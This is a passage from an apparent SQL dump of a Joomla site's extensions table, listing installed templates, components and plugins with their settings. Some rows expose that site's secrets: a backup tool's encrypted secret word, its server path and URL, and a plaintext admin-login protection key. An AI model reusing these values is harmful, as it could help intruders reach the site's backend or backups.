href=\'https:\\/\\/github.com\\/JPathRu\\/localisation\' target=\'_blank\'>Github<\\/a>.<\\/p><ul><li><a href=\'https:\\/\\/joomlaportal.ru\' target=\'_blank\'>\\u041f\\u043e\\u0440\\u0442\\u0430\\u043b Joomla \\u043f\\u043e-\\u0440\\u0443\\u0441\\u0441\\u043a\\u0438<\\/a>,<\\/li><li><a href=\'https:\\/\\/joomlaforum.ru\' target=\'_blank\'>\\u0424\\u043e\\u0440\\u0443\\u043c \\u0440\\u0443\\u0441\\u0441\\u043a\\u043e\\u0439 \\u043f\\u043e\\u0434\\u0434\\u0435\\u0440\\u0436\\u043a\\u0438 Joomla<\\/a>,<\\/li><li><a href=\'https:\\/\\/joomlaportal.ru\\/russian-joomla\' target=\'_blank\'>\\u041e\\u0444\\u0438\\u0446\\u0438\\u0430\\u043b\\u044c\\u043d\\u0430\\u044f \\u0441\\u0442\\u0440\\u0430\\u043d\\u0438\\u0446\\u0430 \\u043b\\u043e\\u043a\\u0430\\u043b\\u0438\\u0437\\u0430\\u0446\\u0438\\u0438<\\/a>.<\\/li><\\/ul><\\/div>\",\"group\":\"\",\"filename\":\"pkg_ru-RU\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10008,0,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10009,0,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10010,0,'beez3','template','beez3','',0,1,1,0,'{\"name\":\"beez3\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"3.1.0\",\"description\":\"TPL_BEEZ3_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"templateDetails\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(10013,0,'com_phocagallery','component','com_phocagallery','',1,1,0,0,'{\"name\":\"com_phocagallery\",\"type\":\"component\",\"creationDate\":\"13\\/08\\/2015\",\"author\":\"Jan Pavelka (www.phoca.cz)\",\"copyright\":\"Jan Pavelka\",\"authorEmail\":\"\",\"authorUrl\":\"www.phoca.cz\",\"version\":\"4.2.1\",\"description\":\"Phoca Gallery\",\"group\":\"\",\"filename\":\"phocagallery\"}','{\"category_ordering\":\"1\",\"categories_description\":\"\",\"image_categories_size\":\"1\",\"categories_image_ordering\":\"10\",\"categories_display_avatar\":\"0\",\"display_subcategories\":\"1\",\"display_empty_categories\":\"0\",\"display_access_category\":\"0\",\"hide_categories\":\"\",\"show_categories\":\"\",\"default_pagination_categories\":\"0\",\"pagination_categories\":\"5,10,15,20,50\",\"categories_box_space\":\"0\",\"display_cat_desc_box\":\"0\",\"char_cat_length_name\":\"9\",\"categories_mosaic_images\":\"0\",\"display_image_categories\":\"5\",\"equal_percentage_width\":\"1\",\"categories_box_width\":\"33%\",\"categories_columns\":\"1\",\"image_ordering\":\"1\",\"display_new\":\"0\",\"display_hot\":\"0\",\"display_name\":\"0\",\"display_icon_detail\":\"0\",\"display_icon_download\":\"0\",\"char_length_name\":\"15\",\"category_box_space\":\"0\",\"display_categories_sub\":\"0\",\"display_subcat_page\":\"0\",\"display_category_icon_image\":\"0\",\"category_image_ordering\":\"10\",\"display_back_button\":\"1\",\"display_categories_back_button\":\"1\",\"default_pagination_category\":\"20\",\"pagination_category\":\"5,10,15,20,50\",\"display_img_desc_box\":\"0\",\"diff_thumb_height\":\"0\",\"display_categories_cv\":\"0\",\"display_subcat_page_cv\":\"0\",\"display_back_button_cv\":\"1\",\"display_categories_back_button_cv\":\"1\",\"switch_image\":\"0\",\"switch_width\":\"640\",\"switch_height\":\"480\",\"switch_fixed_size\":\"0\",\"enable_overlib\":\"0\",\"overlib_image_rate\":\"\",\"overlib_attributes\":\"BELOW, RIGHT, CSSCLASS, TEXTFONTCLASS, \'fontPhocaClass\', FGCLASS, \'fgPhocaClass\', BGCLASS, \'bgPhocaClass\', CAPTIONFONTCLASS,\'capfontPhocaClass\', CLOSEFONTCLASS, \'capfontclosePhocaClass\'\",\"display_category_statistics\":\"0\",\"display_main_cat_stat\":\"1\",\"display_lastadded_cat_stat\":\"1\",\"count_lastadded_cat_stat\":\"3\",\"display_mostviewed_cat_stat\":\"1\",\"count_mostviewed_cat_stat\":\"3\",\"display_camera_info\":\"0\",\"exif_information\":\"FILE.FileName,FILE.FileDateTime,FILE.FileSize,FILE.MimeType,COMPUTED_Height,COMPUTED_Width,COMPUTED_IsColor,COMPUTED_ApertureFNumber,IFD0.Make,IFD0.Model,IFD0.Orientation,IFD0.XResolution,IFD0.YResolution,IFD0.ResolutionUnit,IFD0.Software,IFD0.DateTime,IFD0.Exif_IFD_Pointer,IFD0.GPS_IFD_Pointer,EXIF.ExposureTime,EXIF.FNumber,EXIF.ExposureProgram,EXIF.ISOSpeedRatings,EXIF.ExifVersion,EXIF.DateTimeOriginal,EXIF.DateTimeDigitized,EXIF.ShutterSpeedValue,EXIF.ApertureValue,EXIF.ExposureBiasValue,EXIF.MaxApertureValue,EXIF.MeteringMode,EXIF.LightSource,EXIF.Flash,EXIF.FocalLength,EXIF.SubSecTimeOriginal,EXIF.SubSecTimeDigitized,EXIF.ColorSpace,EXIF.ExifImageWidth,EXIF.ExifImageLength,EXIF.SensingMethod,EXIF.CustomRendered,EXIF.ExposureMode,EXIF.WhiteBalance,EXIF.DigitalZoomRatio,EXIF.FocalLengthIn35mmFilm,EXIF.SceneCaptureType,EXIF.GainControl,EXIF.Contrast,EXIF.Saturation,EXIF.Sharpness,EXIF.SubjectDistanceRange,GPS.GPSLatitudeRef,GPS.GPSLatitude,GPS.GPSLongitudeRef,GPS.GPSLongitude,GPS.GPSAltitudeRef,GPS.GPSAltitude,GPS.GPSTimeStamp,GPS.GPSStatus,GPS.GPSMapDatum,GPS.GPSDateStamp\",\"detail_window\":\"0\",\"modal_box_overlay_opacity\":\"0.3\",\"sb_slideshow_delay\":\"5\",\"sb_settings\":\"overlayColor: \'#000\',overlayOpacity:0.5,resizeDuration:0.35,displayCounter:true,displayNav:true\",\"highslide_class\":\"rounded-white\",\"highslide_opacity\":\"0\",\"highslide_outline_type\":\"rounded-white\",\"highslide_fullimg\":\"0\",\"highslide_close_button\":\"0\",\"highslide_slideshow\":\"1\",\"jak_slideshow_delay\":\"5\",\"jak_orientation\":\"none\",\"jak_description\":\"1\",\"jak_description_height\":\"10\",\"boxplus_theme\":\"lightsquare\",\"boxplus_bautocenter\":\"1\",\"boxplus_autofit\":\"1\",\"boxplus_slideshow\":\"0\",\"boxplus_loop\":\"0\",\"boxplus_captions\":\"bottom\",\"boxplus_thumbs\":\"inside\",\"boxplus_duration\":\"250\",\"boxplus_transition\":\"linear\",\"boxplus_contextmenu\":\"1\",\"enable_multibox\":\"0\",\"display_multibox\":[\"1\"],\"multibox_width\":\"980\",\"multibox_height\":\"560\",\"multibox_map_width\":\"280\",\"multibox_map_height\":\"300\",\"multibox_thubms_box_width\":\"300\",\"multibox_thubms_count\":\"4\",\"multibox_comments_width\":\"300\",\"multibox_comments_height\":\"600\",\"multibox_fixed_cols\":\"1\",\"ytb_display\":\"0\",\"display_description_detail\":\"0\",\"display_title_description\":\"0\",\"slideshow_delay\":\"3000\",\"slideshow_pause\":\"2000\",\"slideshow_random\":\"0\",\"slideshow_description\":\"peekaboo\",\"detail_buttons\":\"1\",\"youtube_api_key\":\"\",\"youtube_api_ssl\":\"0\",\"phocagallery_width\":\"\",\"phocagallery_center\":\"0\",\"gallery_metadesc\":\"\",\"gallery_metakey\":\"\",\"alt_value\":\"1\",\"display_tags_links\":\"0\",\"tags_links\":\"0\",\"display_feed\":\"0\",\"feed_cat_ids\":\"\",\"feed_img_ordering\":\"6\",\"feed_img_count\":\"5\",\"feed_title\":\"\",\"enable_picasa_loading\":\"1\",\"picasa_load_pagination\":\"20\",\"enable_facebook_loading\":\"1\",\"fb_load_pagination\":\"25\",\"enable_cache\":\"0\",\"display_categories_geotagging\":\"0\",\"categories_lng\":\"\",\"categories_lat\":\"\",\"categories_zoom\":\"2\",\"categories_map_width\":\"\",\"categories_map_height\":\"500\",\"display_icon_geotagging\":\"0\",\"display_category_geotagging\":\"0\",\"category_map_width\":\"\",\"category_map_height\":\"400\",\"display_icon_vm\":\"0\",\"enable_user_cp\":\"0\",\"enable_upload_avatar\":\"1\",\"enable_avatar_approve\":\"0\",\"enable_usercat_approve\":\"0\",\"enable_usersubcat_approve\":\"0\",\"enable_direct_subcat\":\"0\",\"user_subcat_count\":\"5\",\"max_create_cat_char\":\"1000\",\"user_ucp_lang\":\"1\",\"enable_userimage_approve\":\"0\",\"max_upload_char\":\"1000\",\"upload_maxsize\":\"3145728\",\"upload_maxres_width\":\"3072\",\"upload_maxres_height\":\"2304\",\"user_images_max_size\":\"20971520\",\"enable_multiple\":\"0\",\"multiple_upload_method\":\"1\",\"multiple_upload_chunk\":\"0\",\"multiple_resize_width\":\"-1\",\"multiple_resize_height\":\"-1\",\"enable_java\":\"-1\",\"java_box_width\":\"480\",\"java_box_height\":\"480\",\"youtube_upload\":\"0\",\"display_rating\":\"0\",\"display_rating_img\":\"0\",\"display_comment\":\"0\",\"display_comment_img\":\"0\",\"comment_width\":\"500\",\"max_comment_char\":\"1000\",\"display_comment_nopup\":\"0\",\"external_comment_system\":\"0\",\"fb_comment_user_id\":\"\",\"pagination_thumbnail_creation\":\"0\",\"clean_thumbnails\":\"0\",\"enable_thumb_creation\":\"1\",\"crop_thumbnail\":\"5\",\"additional_thumbnails\":\"0\",\"jpeg_quality\":\"85\",\"large_image_width\":\"640\",\"large_image_height\":\"480\",\"medium_image_width\":\"100\",\"medium_image_height\":\"100\",\"small_image_width\":\"50\",\"small_image_height\":\"50\",\"front_modal_box_width\":\"680\",\"front_modal_box_height\":\"560\",\"create_watermark\":\"0\",\"watermark_position_x\":\"center\",\"watermark_position_y\":\"middle\",\"folder_permissions\":\"0755\",\"jfile_thumbs\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10030,0,'com_xmap','component','com_xmap','',1,1,0,0,'false','{}','','',0,'0000-00-00 00:00:00',0,0),(10031,0,'Xmap - Content Plugin','plugin','com_content','xmap',0,1,1,0,'{\"name\":\"Xmap - Content Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"XMAP_CONTENT_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_content\"}','{\"expand_categories\":\"1\",\"expand_featured\":\"1\",\"include_archived\":\"2\",\"show_unauth\":\"0\",\"add_pagebreaks\":\"1\",\"max_art\":\"0\",\"max_art_age\":\"0\",\"add_images\":\"1\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"art_priority\":\"-1\",\"art_changefreq\":\"-1\",\"keywords\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(10032,0,'Xmap - Kunena Plugin','plugin','com_kunena','xmap',0,0,1,0,'{\"name\":\"Xmap - Kunena Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"Xmap Plugin for Kunena component\",\"group\":\"\",\"filename\":\"com_kunena\"}','{\"include_topics\":\"1\",\"max_topics\":\"\",\"max_age\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"topic_priority\":\"-1\",\"topic_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10033,0,'Xmap - SobiPro Plugin','plugin','com_sobipro','xmap',0,0,1,0,'{\"name\":\"Xmap - SobiPro Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"Xmap Plugin for SobiPro component\",\"group\":\"\",\"filename\":\"com_sobipro\"}','{\"include_entries\":\"1\",\"max_entries\":\"\",\"max_age\":\"\",\"entries_order\":\"a.ordering\",\"entries_orderdir\":\"DESC\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"weekly\",\"entry_priority\":\"-1\",\"entry_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10034,0,'Xmap - Mosets Tree Plugin','plugin','com_mtree','xmap',0,0,1,0,'{\"name\":\"Xmap - Mosets Tree Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"XMAP_MTREE_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_mtree\"}','{\"cats_order\":\"cat_name\",\"cats_orderdir\":\"ASC\",\"include_links\":\"1\",\"links_order\":\"ordering\",\"entries_orderdir\":\"ASC\",\"max_links\":\"\",\"max_age\":\"\",\"cat_priority\":\"0.5\",\"cat_changefreq\":\"weekly\",\"link_priority\":\"0.5\",\"link_changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10035,0,'Xmap - Virtuemart Plugin','plugin','com_virtuemart','xmap',0,0,1,0,'{\"name\":\"Xmap - Virtuemart Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"XMAP_VM_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_virtuemart\"}','{\"include_products\":\"1\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"prod_priority\":\"-1\",\"prod_changefreq\":\"-1\"}','','',0,'0000-00-00 00:00:00',0,0),(10036,0,'Xmap - WebLinks Plugin','plugin','com_weblinks','xmap',0,1,1,0,'{\"name\":\"Xmap - WebLinks Plugin\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"XMAP_WL_PLUGIN_DESCRIPTION\",\"group\":\"\",\"filename\":\"com_weblinks\"}','{\"include_links\":\"1\",\"max_links\":\"\",\"cat_priority\":\"-1\",\"cat_changefreq\":\"-1\",\"link_priority\":\"-1\",\"link_changefreq\":\"-1\"}','','',62,'2016-03-31 14:43:49',0,0),(10037,0,'XMAP_PLUGIN_K2','plugin','com_k2','xmap',0,0,1,0,'{\"name\":\"XMAP_PLUGIN_K2\",\"type\":\"plugin\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"GNU GPL\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"XMAP_PLUGIN_K2_DESC\",\"group\":\"\",\"filename\":\"com_k2\"}','{\"subcategories\":\"no\",\"showk2items\":\"always\",\"suppressdups\":\"no\",\"priority\":\"0.5\",\"changefreq\":\"weekly\"}','','',0,'0000-00-00 00:00:00',0,0),(10038,0,'Xmap Package','package','pkg_xmap','',0,1,1,0,'{\"name\":\"Xmap Package\",\"type\":\"package\",\"creationDate\":\"2013-11-15\",\"author\":\"Vladimir Maidanichenko\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters.\",\"authorEmail\":\"support@joomlamaster.org.ua\",\"authorUrl\":\"joomlamaster.org.ua\",\"version\":\"2.3.4\",\"description\":\"The Site Map generator for Joomla 2.5 and more!\",\"group\":\"\",\"filename\":\"pkg_xmap\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10039,0,'plg_mavikthumbnails','plugin','mavikthumbnails','content',0,1,1,0,'{\"name\":\"plg_mavikthumbnails\",\"type\":\"plugin\",\"creationDate\":\"2014-03-15\",\"author\":\"Vitaliy Marenkov\",\"copyright\":\"2009-2014 (c) Vitaliy Marenkov\",\"authorEmail\":\"admin@mavik.com.ua\",\"authorUrl\":\"www.mavik.com.ua\",\"version\":\"2.3.3\",\"description\":\"PLG_MAVIKTHUMBNAILS_DESCRIPTION\",\"group\":\"\",\"filename\":\"mavikthumbnails\"}','{\"thumbnails_for\":\"0\",\"class\":\"\",\"popuptype\":\"slimbox2\",\"in_link\":\"without_decor\",\"resize_type\":\"fill\",\"default_size\":\"\",\"default_width\":\"\",\"default_height\":\"\",\"gallery\":\"1\",\"gallery_resize_type\":\"fill\",\"gallery_width\":\"200\",\"gallery_height\":\"200\",\"article_images\":\"1\",\"article_images_intro_place\":\"text\",\"article_images_intro_width\":\"200\",\"article_images_intro_height\":\"200\",\"article_images_use_intro\":\"1\",\"article_images_full_place\":\"text\",\"article_images_full_width\":\"200\",\"article_images_full_height\":\"200\",\"hover\":\"0\",\"hover_ratio\":\"2\",\"retina\":\"1\",\"retina_ratio\":\"2,3\",\"graphic_library\":\"imagick\",\"quality\":\"60\",\"thumbputh\":\"images\\/thumbnails\",\"remoteputh\":\"images\\/remote\",\"remote_copy\":\"0\",\"subdirectories\":\"1\",\"link_scripts\":\"1\",\"move_style\":\"1\",\"use_link_style\":\"1\",\"link_style\":\"display: inline-block; zoom: 1; *display: inline;\",\"context_settings\":\"\",\"context_processing\":\"1\",\"og_image\":\"selected\",\"og_image_context\":\"com_content.article\",\"og_image_width_min\":\"200\",\"og_image_height_min\":\"200\",\"og_image_width_max\":\"1200\",\"og_image_height_max\":\"1200\",\"context_show\":\"0\"}','','',62,'2021-05-26 15:39:45',0,0),(10041,0,'mAvik thumbnails','package','pkg_mavikthumbnails','',0,1,1,0,'{\"name\":\"mAvik thumbnails\",\"type\":\"package\",\"creationDate\":\"March 2014\",\"author\":\"Vitaliy Marenkov\",\"copyright\":\"2009-2014 (c) Vitaliy Marenkov\",\"authorEmail\":\"admin@mavik.com.ua\",\"authorUrl\":\"http:\\/\\/mavik.com.ua\",\"version\":\"2.3.3\",\"description\":\"\\n        Plugin creates previews for images. Plugin should enable in Extension Manager.\\n    \",\"group\":\"\",\"filename\":\"pkg_mavikthumbnails\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10042,0,'Admintools','component','com_admintools','',1,0,0,0,'{\"name\":\"Admintools\",\"type\":\"component\",\"creationDate\":\"2016-07-01\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.8.6\",\"description\":\"Security and utilitarian tools for Joomla! site administrators\",\"group\":\"\",\"filename\":\"admintools\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10043,0,'System - Admin Tools','plugin','admintools','system',0,0,1,0,'{\"name\":\"System - Admin Tools\",\"type\":\"plugin\",\"creationDate\":\"2016-07-01\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2010-2016 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"http:\\/\\/www.akeebabackup.com\",\"version\":\"3.8.6\",\"description\":\"\\n\\t\\tHandles all the system-wide features provided by Admin Tools Core\\n\\t\",\"group\":\"\",\"filename\":\"admintools\"}','{}','','',0,'0000-00-00 00:00:00',-1,0),(10045,0,'AkeebaStrapper','file','AkeebaStrapper','',0,1,0,0,'{\"name\":\"AkeebaStrapper\",\"type\":\"file\",\"creationDate\":\"2016-03-15\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"(C) 2012-2013 Akeeba Ltd.\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"rev45C6E76\",\"description\":\"Namespaced jQuery, jQuery UI and Bootstrap for Akeeba products.\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10046,0,'admintools - ru-RU','file','admintools-ru-RU','',0,1,0,0,'{\"name\":\"admintools - ru-RU\",\"type\":\"file\",\"creationDate\":\"05 Nov 2015\",\"author\":\"AkeebaBackup.com\",\"copyright\":\"Copyright (C)2015 AkeebaBackup.com. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"\\/Users\\/nikosdion\\/Projects\\/akeeba\\/jadmintools\\/build\\/..\",\"description\":\"Russian (Russia) translation file for Admin Tools\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10047,10076,'Akeeba','component','com_akeeba','',1,1,0,0,'{\"name\":\"Akeeba\",\"type\":\"component\",\"creationDate\":\"2022-08-22\",\"author\":\"Nicholas K. Dionysopoulos\",\"copyright\":\"Copyright (c)2006-2019 Akeeba Ltd \\/ Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@dionysopoulos.me\",\"authorUrl\":\"https:\\/\\/www.akeeba.com\",\"version\":\"8.1.10\",\"description\":\"Akeeba Backup Core - Full Joomla! site backup solution, Core Edition.\",\"group\":\"\",\"filename\":\"akeeba\"}','{\"confwiz_upgrade\":1,\"siteurl\":\"https:\\/\\/ekvatorprint.com.ua\\/\",\"jlibrariesdir\":\"\\/sata1\\/home\\/users\\/ekvatorpr\\/www\\/www.ekvatorprint.com.ua\\/libraries\",\"jversion\":\"1.6\",\"show_howtorestoremodal\":0,\"updatedb\":null,\"frontend_secret_word\":\"###AES128###b+EyE5Nh1ZCFnB0BokeqdUpQU1TYHBcgRIwngZPK2BW5ogkqOEA+i0kBeKTocpIEVXfStG7SbqFIzaLjoR82yRcn+rC1K5OArZeki8IHC6uNFCbESlBJVs3EN6wb6YNDV4TIpq7p8wwAAAAA\"}','','',0,'0000-00-00 00:00:00',0,0),(10048,0,'akeebabackup - ru-RU','file','akeebabackup-ru-RU','',0,1,0,0,'{\"name\":\"akeebabackup - ru-RU\",\"type\":\"file\",\"creationDate\":\"22 Dec 2015\",\"author\":\"AkeebaBackup.com\",\"copyright\":\"Copyright (C)2015 AkeebaBackup.com. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"\\/Users\\/nikosdion\\/Projects\\/akeeba\\/backup\\/build\\/..\",\"description\":\"Russian (Russia) translation file for Akeeba Backup\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10049,0,'Securitycheck','component','com_securitycheck','',1,0,0,0,'{\"name\":\"Securitycheck\",\"type\":\"component\",\"creationDate\":\"22-10-2015\",\"author\":\"Jose A. Luque\",\"copyright\":\"Copyright www.protegetuordenador.com\",\"authorEmail\":\"contacto@protegetuordenador.com\",\"authorUrl\":\"http:\\/\\/www.protegetuordenador.com\",\"version\":\"2.8.2\",\"description\":\"COM_SECURITYCHECK_DESCRIPTION\",\"group\":\"\",\"filename\":\"securitycheck\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10050,0,'System - Securitycheck','plugin','securitycheck','system',0,0,1,0,'{\"name\":\"System - Securitycheck\",\"type\":\"plugin\",\"creationDate\":\"22-10-2015\",\"author\":\"Jos\\u00e9 A. Luque \",\"copyright\":\"Copyright www.protegetuordenador.com\",\"authorEmail\":\"contacto@protegetuordenador.com\",\"authorUrl\":\"www.protegetuordenador.com\",\"version\":\"2.8.2\",\"description\":\"PLG_SECURITYCHECK_DESCRIPTION\",\"group\":\"\",\"filename\":\"securitycheck\"}','{\"blacklist\":\"\",\"whitelist\":\"\",\"methods\":\"GET,POST,REQUEST\",\"mode\":\"1\",\"logs_attacks\":\"1\",\"redirect_after_attack\":\"1\",\"redirect_options\":\"1\",\"second_level\":\"1\",\"second_level_redirect\":\"1\",\"available_components\":\"10013\",\"exclude_exceptions_if_vulnerable\":\"1\",\"check_header_referer\":\"1\",\"check_base_64\":\"1\",\"base64_exceptions\":\"com_hikashop\",\"strip_tags_exceptions\":\"com_jdownloads,com_hikashop\",\"duplicate_backslashes_exceptions\":\"com_kunena\",\"line_comments_exceptions\":\"com_comprofiler\",\"sql_pattern_exceptions\":\"\",\"if_statement_exceptions\":\"\",\"using_integers_exceptions\":\"com_dms,com_comprofiler,com_jce,com_contactenhanced\",\"escape_strings_exceptions\":\"com_kunena,com_jce\",\"lfi_exceptions\":\"\",\"second_level_exceptions\":\"\",\"session_protection_active\":\"1\"}','','',0,'0000-00-00 00:00:00',7,0),(10051,0,'plg_system_jlsecuremysite','plugin','jlsecuremysite','system',0,0,1,0,'{\"name\":\"plg_system_jlsecuremysite\",\"type\":\"plugin\",\"creationDate\":\"May 2011\",\"author\":\"JomLand\",\"copyright\":\"Copyright (C) 2012 jomland.com. All rights reserved.\",\"authorEmail\":\"info@jomland.com\",\"authorUrl\":\"http:\\/\\/www.jomland.com\",\"version\":\"1.0.2\",\"description\":\"PLG_JLSECUREMYSITE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"jlsecuremysite\"}','{\"secure_key\":\"secret_key\",\"secure_value\":\"push_it_backward\"}','','',0,'0000-00-00 00:00:00',11,0),(10052,0,'plg_installer_webinstaller','plugin','webinstaller','installer',0,1,1,0,'{\"name\":\"plg_installer_webinstaller\",\"type\":\"plugin\",\"creationDate\":\"28 April 2017\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2013 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.1.2\",\"description\":\"PLG_INSTALLER_WEBINSTALLER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"webinstaller\"}','{\"tab_position\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10053,0,'COM_FST','component','com_fst','',1,1,0,0,'{\"name\":\"COM_FST\",\"type\":\"component\",\"creationDate\":\"2016-05-19\",\"author\":\"Freestyle Joomla\",\"copyright\":\"Copyright Freestyle Joomla 2016\",\"authorEmail\":\"support@freestyle-joomla.com\",\"authorUrl\":\"http:\\/\\/www.freestyle-joomla.com\",\"version\":\"1.13.2\",\"description\":\"Freestyle Testimonials\",\"group\":\"\",\"filename\":\"fst\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10054,0,'Freestyle Testimonials: Testimonials','module','mod_fst_test','',0,1,0,0,'{\"name\":\"Freestyle Testimonials: Testimonials\",\"type\":\"module\",\"creationDate\":\"2013 09 26\",\"author\":\"Freestyle Joomla\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"1.11.8.1718\",\"description\":\"Module to list your testimonials\",\"group\":\"\",\"filename\":\"mod_fst_test\"}','{\"prodid\":\"\",\"listtype\":\"0\",\"dispcount\":\"3\",\"maxheight\":\"0\",\"speed\":\"40\",\"show_more\":\"1\",\"show_add\":\"1\",\"looped_scroll\":\"0\",\"maxlength\":\"150\",\"morelink\":\"\",\"addlink\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10056,0,'JCE','component','com_jce','',1,1,0,0,'{\"name\":\"JCE\",\"type\":\"component\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights reserved\",\"authorEmail\":\"info@joomlacontenteditor.net\",\"authorUrl\":\"www.joomlacontenteditor.net\",\"version\":\"2.5.31\",\"description\":\"WF_ADMIN_DESC\",\"group\":\"\",\"filename\":\"jce\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10057,0,'plg_editors_jce','plugin','jce','editors',0,1,1,0,'{\"name\":\"plg_editors_jce\",\"type\":\"plugin\",\"creationDate\":\"25 October 2016\",\"author\":\"Ryan Demmer\",\"copyright\":\"Copyright (C) 2006 - 2016 Ryan Demmer. All rights 